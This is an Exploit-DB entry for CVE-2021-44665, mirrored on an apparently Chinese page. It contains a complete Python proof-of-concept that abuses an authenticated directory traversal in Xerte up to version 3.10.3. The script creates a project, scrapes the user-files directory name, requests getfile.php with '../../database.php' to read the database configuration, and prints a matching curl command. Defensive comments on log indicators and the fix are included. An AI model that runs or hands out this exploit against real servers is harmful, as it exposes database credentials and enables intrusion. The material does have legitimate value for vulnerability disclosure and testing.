Xerte 3.10.3 – Directory Traversal (Authenticated)

  • 作者: Rik Lutz
    日期: 2022-03-02
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/50794/
  • # Exploit Title: Xerte 3.10.3 - Directory Traversal (Authenticated)
    # Date: 05/03/2021
    # Exploit Author: Rik Lutz
    # Vendor Homepage: https://xerte.org.uk
    # Software Link: https://github.com/thexerteproject/xerteonlinetoolkits/archive/refs/heads/3.9.zip
    # Version: up until 3.10.3
    # Tested on: Windows 10 XAMPP
    # CVE : CVE-2021-44665
    
    # This PoC assumes guest login is enabled. Vulnerable URL:
    # https://<host>/getfile.php?file=<user-directory>/../../database.php
    # You can find a userfiles-directory by creating a project and browsing the media menu.
    # Create new project from template -> visit "Properties" (! symbol) -> Media and Quota -> Click file to download
    # The userfiles-directory is shown in the URL and/or in the link when you download a file.
    # They look like: <numbers>-<username>-<templatename>
    
    import requests
    import re
    
    # Target and traversal payload. file_to_grab is appended to a per-user
    # media-directory name, so the final request has the shape
    # getfile.php?file=<user-dir>/../../database.php. The ".." segments inside
    # the `file` parameter are the indicator to alert on in web-server/WAF
    # logs; the usual server-side remedy is to canonicalise `file` and reject
    # anything that resolves outside the user directory (the header states
    # versions up to 3.10.3 are affected).
    xerte_base_url = "http://127.0.0.1"
    file_to_grab = "/../../database.php"
    # Optional pre-existing PHPSESSID. Left empty, the script expects the
    # server to issue a session cookie on a plain GET (the header assumes
    # guest login is enabled). With guest login disabled, a valid account
    # session is required instead, which narrows who can reach this path.
    php_session_id = ""

    with requests.Session() as session:
        # Obtain a PHP session ID, either by letting the server issue one
        # or by reusing the one supplied above.
        if not php_session_id:
            session.get(xerte_base_url)
        else:
            session.cookies.set("PHPSESSID", php_session_id)

        # Form fields for creating a project from the default template.
        data = {
            'tutorialid': 'Nottingham',
            'templatename': 'Nottingham',
            'tutorialname': 'exploit',
            'folder_id': ''
        }

        # Creating a project is a persistent side effect on the target: it
        # provisions the user folder the traversal later starts from.
        # Defenders can correlate new_template.php POSTs with subsequent
        # getfile.php requests whose `file` value contains "..".
        template_id = session.post(xerte_base_url + '/website_code/php/templates/new_template.php', data=data)

        # Extract the numeric template ID from the response body.
        # NOTE: non-raw regex literal — the `\d` escape emits a SyntaxWarning
        # on Python 3.12+; `[0]` raises IndexError if no digits are found.
        data = {
            'template_id': re.findall('(\d+)', template_id.text)[0]
        }

        # Load the project's media page and pull the user-directory name
        # (<numbers>-<username>-<templatename>) out of a USER-FILES/ path.
        # Same non-raw regex / `[0]` caveat as above.
        user_direcotry = session.post(xerte_base_url + '/website_code/php/properties/media_and_quota_template.php', data=data)
        user_direcotry = re.findall('USER-FILES\/([0-9]+-[a-z0-9]+-[a-zA-Z0-9_]+)', user_direcotry.text)[0]

        # Fetch the file through the traversal and report the values used,
        # including an equivalent curl line for reproduction in a test lab.
        result = session.get(xerte_base_url + '/getfile.php?file=' + user_direcotry + file_to_grab)
        print(result.text)
        print("|-- Used Variables: --|")
        print("PHP Session ID: " + session.cookies.get_dict()['PHPSESSID'])
        print("user direcotry: " + user_direcotry)
        print("Curl example:")
        print('curl --cookie "PHPSESSID=' + session.cookies.get_dict()['PHPSESSID'] + '" ' + xerte_base_url + '/getfile.php?file=' + user_direcotry + file_to_grab)